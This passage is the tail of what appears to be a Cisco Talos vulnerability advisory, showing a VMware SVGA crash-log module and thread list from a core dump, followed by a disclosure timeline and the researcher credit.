2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc8020000 size 0x0x0000a000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x0000ec91 timestamp 0x389781ac
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\rasadhlp.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6a20000 size 0x0x000a2000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x000a9f48 timestamp 0xaaba4fa9
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\clbcatq.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 2001.12.10941.16384
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc80e0000 size 0x0x00011000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x0000bb8c timestamp 0x80ed95b9
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\wbem\wbemprox.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc8050000 size 0x0x00085000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x000821c7 timestamp 0x264de62a
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\wbemcomn.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc5e40000 size 0x0x00014000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x00015c08 timestamp 0x42167f4e
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\wbem\wbemsvc.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc5e60000 size 0x0x000f1000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x000f6195 timestamp 0xc27bfeee
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\wbem\fastprox.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd74f0000 size 0x0x00008000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x00009082 timestamp 0x43f78f9f
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\psapi.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdbe270000 size 0x0x001ed000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x001d72c0 timestamp 0x05f0e9a4
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\dbghelp.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6d70000 size 0x0x0016a000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x0016bce2 timestamp 0x6fda36d1
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\msctf.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.348
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd4af0000 size 0x0x00058000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x0005f200 timestamp 0xd1e21847
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\winsta.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc3590000 size 0x0x00066000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x00061b53 timestamp 0x9ff9e1ff
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\SensorsApi.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.168
2019-04-17T09:09:23.823+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc79c0000 size 0x0x0001e000
2019-04-17T09:09:23.823+02:00| svga| I125:   checksum 0x00021e5c timestamp 0xbbb5f881
2019-04-17T09:09:23.823+02:00| svga| I125:   image file C:\Windows\System32\SensorsUtilsV2.dll
2019-04-17T09:09:23.823+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc56a0000 size 0x0x00024000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x00023855 timestamp 0xabdcae8a
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\SensorsNativeApi.V2.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1b80000 size 0x0x001a8000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x001b32e3 timestamp 0x70304c01
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\propsys.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 7.0.17763.348
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdb49d0000 size 0x0x00030000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x00032b59 timestamp 0x91d63955
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\PortableDeviceTypes.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc1540000 size 0x0x00036000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x0003e09f timestamp 0x2c0d51d2
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\deviceaccess.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd6290000 size 0x0x00059000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x0005ee01 timestamp 0xd51e499a
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\wintrust.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.348
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd3aa0000 size 0x0x0002e000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x000380b6 timestamp 0xb90c6519
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\dwmapi.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd1020000 size 0x0x0000a000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x000100e7 timestamp 0xb11b88e5
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\version.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd7170000 size 0x0x0001d000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x000270f8 timestamp 0x00e30045
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\imagehlp.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc00b0000 size 0x0x002ae000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x002b11fb timestamp 0x5ca37760
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\nvspcap64.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 3.18.0.102
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdc7ce0000 size 0x0x000ad000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x000a8b32 timestamp 0x700dafec
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\mscms.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcde10000 size 0x0x00010000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x0000eeb8 timestamp 0xb5672678
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\ColorAdapterClient.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd5290000 size 0x0x00028000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x0002961f timestamp 0xbbcbf3a2
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\userenv.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdb4950000 size 0x0x00043000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x0004a1f9 timestamp 0xa5d2ba3f
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\icm32.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd2770000 size 0x0x0027e000
2019-04-17T09:09:23.824+02:00| svga| I125:   checksum 0x0028c849 timestamp 0x13a31007
2019-04-17T09:09:23.824+02:00| svga| I125:   image file C:\Windows\System32\d3d11.dll
2019-04-17T09:09:23.824+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.824+02:00| svga| I125: CoreDump: including module base 0x0x7ffdd40e0000 size 0x0x000c2000
2019-04-17T09:09:23.825+02:00| svga| I125:   checksum 0x000c506d timestamp 0x6b3e2414
2019-04-17T09:09:23.825+02:00| svga| I125:   image file C:\Windows\System32\dxgi.dll
2019-04-17T09:09:23.825+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: including module base 0x0x7ffdcf690000 size 0x0x000ee000
2019-04-17T09:09:23.825+02:00| svga| I125:   checksum 0x000ef76f timestamp 0x5cac804c
2019-04-17T09:09:23.825+02:00| svga| I125:   image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_b299c2f3f9b29d45\nvldumdx.dll
2019-04-17T09:09:23.825+02:00| svga| I125:   file version 25.21.14.2531
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: including module base 0x0x7ffdca610000 size 0x0x025b5000
2019-04-17T09:09:23.825+02:00| svga| I125:   checksum 0x025b9b1a timestamp 0x5cac87c1
2019-04-17T09:09:23.825+02:00| svga| I125:   image file C:\Windows\System32\DriverStore\FileRepository\nv_dispwi.inf_amd64_b299c2f3f9b29d45\nvwgf2umx_cfg.dll
2019-04-17T09:09:23.825+02:00| svga| I125:   file version 25.21.14.2531
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: including module base 0x0x7ffdbe240000 size 0x0x0002a000
2019-04-17T09:09:23.825+02:00| svga| I125:   checksum 0x0003488c timestamp 0x590c013e
2019-04-17T09:09:23.825+02:00| svga| I125:   image file C:\Windows\System32\dbgcore.dll
2019-04-17T09:09:23.825+02:00| svga| I125:   file version 10.0.17763.1
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 15404
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 1112
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 14412
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 9072
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 14852
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 6548
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 3324
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 6492
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 11056
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 5956
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 8616
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 12240
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 3860
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 2184
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 6476
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 5792
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 14312
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 13456
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 10372
2019-04-17T09:09:23.825+02:00| svga| I125: CoreDump: Including thread 560

Timeline

2019-04-29 - Vendor Disclosure
2019-08-02 - Vendor Patched/Released

Credit

Discovered by Piotr Bania of Cisco Talos.

TALOS-2019-0813

TALOS-2019-0757

Intelligence Center

Vulnerability Information

Security Resources

Media

Company